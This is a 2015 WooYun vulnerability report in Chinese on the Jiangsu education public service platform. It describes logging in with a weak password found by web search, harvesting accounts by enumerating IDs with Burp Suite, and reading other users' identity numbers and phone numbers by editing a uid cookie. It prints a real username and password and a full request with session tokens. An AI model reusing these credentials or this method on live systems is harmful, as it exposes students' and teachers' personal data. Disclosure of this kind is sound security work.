当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0133539

漏洞标题:江苏省教育信息化公共服务平台某漏洞导致信息泄露

相关厂商:江苏省教育信息化公共服务平台

漏洞作者: 隔壁老三

提交时间:2015-08-14 11:53

修复时间:2015-09-28 10:56

公开时间:2015-09-28 10:56

漏洞类型:未授权访问/权限绕过

危害等级:高

自评Rank:17

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-14: cncert国家互联网应急中心暂未能联系到相关单位,细节仅向通报机构公开
2015-08-24: 细节向核心白帽子及相关领域专家公开
2015-09-03: 细节向普通白帽子公开
2015-09-13: 细节向实习白帽子公开
2015-09-28: 细节向公众公开

简要描述:

江苏省教育信息化公共服务平台一处越权,以及对大量账号爆破测试~

详细说明:

QQ图片20150812092546.png

打开http://**.**.**.**/login.aspx
首先百度一下了**.**.**.**
发现一个可用账号CXZX王力密码123456
于是一场血案就发生了

漏洞证明:

QQ图片20150812085853.png

登陆地址http://**.**.**.**/login.aspx
使用一个账号为 CXZX王力 密码123456 登陆
先来做一个信息收集
点击右上角 找人~ 在搜索栏里随便输入一个c
出来一大堆用户,点击发现地址栏里有id= ~
于是使用Burpsuite搜集账号

QQ图片20150812092912.jpg


QQ图片20150812092916.png


使用Burpsuite,修改id。使用Interder搜集了一大堆账号

QQ图片20150812085853.png


QQ图片20150812085950.png


再先退出登陆,使用搜集的账号进行登陆

QQ图片20150812090746.png


虽然密码用MD5的方法加了密,然而并没什么卵用0.0
------------------------------------------我是分界线,下面是重点
这里是一枚越权
首先,使用一个账号登陆。经过上面的步骤,账号已经数不胜数了
登陆后有一个基本信息

QQ图片20150812092546.png

<
打开Burpsuite拦截
刷新页面
GET /index.php?m=ta&id=50383629 HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: jse_up=uid%3d50378298%26username%3dcxzx%e7%8e%8b%e5%8a%9b%26nickname%3d%e5%9f%8e%e8%a5%bf%e4%b8%ad%e5%ad%a6%e7%8e%8b%e5%8a%9b%26name%3d%e7%8e%8b%e5%8a%9b%26locationcode%3d320721%26location%3d%e8%b5%a3%e6%a6%86%e5%8e%bf%26orgcode%3d3207213006%26orgname%3d%e8%bf%9e%e4%ba%91%e6%b8%af%e5%b8%82%e5%9f%8e%e8%a5%bf%e4%b8%ad%e5%ad%a6%26orgtype%3dS%26utype%3d4%26d_utype%3d4%26isadm%3dFalse%26email%3d%26url%3d%26p_img%3dhttp%3a%2f%**.**.**.**%2ffs%2fPlatformAvatar%2fao-z1-d1%2f50378298%26domain%3d%26gender%3d1%26orglocationcode%3d320721%26orglocationname%3d%e8%b5%a3%e6%a6%86%e5%8e%bf%26ismaster%3dFalse; jse_ut=b2F1dGhfdG9rZW49MmZiNWY1OTU2M2NlNDIzNmFhN2ZiZTI1YTA4NmUzMDY1MDM3ODI5OCZvYXV0aF90b2tlbl9zZWNyZXQ9MTZkOGJiZGYtMDYwMy00NDQ5LTg0MmYtMzI0OWQ3ZDhkNTMw; jse_id=MGJlOGE0ZGMtMDhmNi00MzUzLWIyMzktNGM4ZDY5MzM5ZWM2; PHPSESSID=dgt96butt30mng5o37d128l7s6; IS_MOBILE_AGENT=0; __rrt_wId=797
将Cookie: jse_up=uid%3d50378298%26username%3dcxzx% 中的uid 50378298进行修改 随便成50378124吧,只要id存在就行。
此处泄露了用户身份证信息,手机号,部分邮箱,教师或者学生,家长所在学校。因为是江苏全省,通过id数量就可以看出用户数量多,信息量大大的~

QQ图片20150812092607.png


修复方案:

你们比我聪明比我强

版权声明:转载请注明来源 隔壁老三@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-08-14 10:55

厂商回复:

CNVD确认所述情况,已经转由CNCERT下发给相应分中心分中心,由其后续协调网站管理单位处置。

最新状态:

暂无


漏洞评价:

评论